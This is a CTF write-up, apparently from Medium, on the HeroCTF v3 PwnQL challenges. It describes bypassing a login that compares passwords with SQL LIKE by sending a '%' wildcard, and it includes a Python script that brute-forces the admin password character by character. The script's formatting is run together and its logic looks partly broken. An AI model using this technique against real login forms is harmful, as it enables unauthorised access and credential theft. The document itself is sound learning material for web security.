HeroCTF v3 Writeup: PwnQL 1 & 2 (SQL Injection)

PwnQL 1 and 2 are web challenges with points 50 and 75 respectively,

Website:

Let’s start by reading the source code:

Hmmm… login.php.bak? Let’s try to get the file:

We have to login as admin to get the flag, to login as admin we have to make the query result true,

password LIKE :password;

They have used LIKE to compare input and password but we can easily bypass this by using SQL wildcard characters:

“%” makes the LIKE comparison always true:

PwnQL #2:

The website is the same used in PwnQL 1, here we have to find the password. Most of the work has been done now, all we have to do is to brute-force the flag using “%”, I wrote a python script to automate this process:

import requestsimport stringurl = "http://chall1.heroctf.fr:8080/index.php"headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': '*/*'}possible_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$_'def get_password(username):    print("Extracting password of "+username)    password = ""    while True:        for c in possible_chars:            payload="username=admin&password="+password+c+"%"            pr = requests.post(url ,data=payload, headers=headers)            print(payload)            if "flag" in pr.text:                password += c            print(password)        break    if c == possible_chars[-1]:    print("Found password "+password[0:].replace("\\", "")+" for username "+username)    return password[1:].replace("\\", "")get_password("admin")

Output:

Спасибо :) — Mudhalai Mr Team 1nf1n1ty

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store